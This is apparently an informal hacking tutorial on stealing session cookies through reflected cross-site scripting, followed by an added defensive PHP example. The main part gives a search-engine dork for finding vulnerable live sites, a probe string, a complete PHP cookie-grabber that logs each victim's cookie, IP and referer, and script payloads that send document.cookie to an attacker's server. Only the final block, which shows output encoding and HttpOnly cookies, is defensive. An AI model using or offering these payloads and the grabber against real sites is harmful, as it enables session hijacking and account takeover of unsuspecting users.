So first we need to find an exploitable site. This one can be used:
google dork: inurl:".com/search.php?keyword="
Why inurl:".com"? Because otherwise we get websites that are not in your language, like Japanese ones. We can change keyword to something else like ?results=, ?word=, etc.
Type this in the search box:
'><script>alert('XSS - UPGOINGSTAR')</script>
' can also be "
If it is vulnerable, a popup will appear with the message: XSS - UPGOINGSTAR.
Yay, we got a big chance to exploit it! Hehe
Let's create THE cookie grabber.
Open notepad and copy/paste this:
<?php
$cookie = $_GET['c'];
$ip = getenv('REMOTE_ADDR');
$date = date("j F, Y, g:i a");
$referer = getenv('HTTP_REFERER');
$fp = fopen('file.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: '.$ip.'<br> Date and Time: '.$date.'<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
header("Location: http://www.site.com/");
?>
Save it as cookie.php, create a .txt file named file.txt, and chmod file.txt to 777.
What does this code do?
1. It steals the cookie, of course.
2. It writes the cookie to file.txt; we can change that if you want.
3. It also writes the IP of the victim and the date when it happened.
4. When it is done, the user is redirected to site.com.
Let's test:
http://www.site.com/search.php input field:
'><script>document.location.replace('http://www.weRSITE.com/cookie.php?c='+document.cookie);</script>
If it worked, you will see the redirect page (Google, or whatever you set in the header) in front of you; then check file.txt on your server.
And you can also try:
http://www.site.com/search.php?keywords='><script>document.location.replace('http://www.weRSITE.com/cookie.php?c='+document.cookie);</script>
Sometimes that way will work, sometimes it won't.
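For the other side of this, here is an added example (not code from the original post): a minimal search.php of the kind the dork above finds, which reflects the keyword unencoded so the probe fires, beside a hardened version that encodes the output and sets the session cookie HttpOnly so document.cookie cannot read it. The file and parameter names follow the post; everything else is assumed.

```php
<?php
// Added example, not part of the original post. search.php / 'keyword'
// follow the dork in the post; the page layout is a constructed stand-in.

// VULNERABLE: the search term goes straight into the HTML attribute, so
// '><script>...</script> closes the attribute and the script executes.
function render_search_vulnerable(string $keyword): string {
    return '<input type="text" name="keyword" value="' . $keyword . '">';
}

// HARDENED: encode for the HTML context before reflecting. ENT_QUOTES
// covers both ' and ", so neither variant of the probe breaks out.
function render_search_safe(string $keyword): string {
    $safe = htmlspecialchars($keyword, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="keyword" value="' . $safe . '">';
}

// Defence in depth: even if some other page still reflects input, an
// HttpOnly session cookie is invisible to document.cookie, so the grabber
// in the post receives nothing useful. 'secure' assumes the site is on HTTPS.
function start_hardened_session(): void {
    session_set_cookie_params([
        'httponly' => true,
        'secure'   => true,
        'samesite' => 'Lax',
    ]);
    session_start();
}

// Demo with the exact probe string from the post (constructed input).
$probe = "'><script>alert('XSS - UPGOINGSTAR')</script>";
echo render_search_vulnerable($probe), "\n";   // script tag lands in the page as-is
echo render_search_safe($probe), "\n";         // every < > ' " is entity-encoded
```

Run it from the command line to compare the two renderings; only the first one contains a live <script> element.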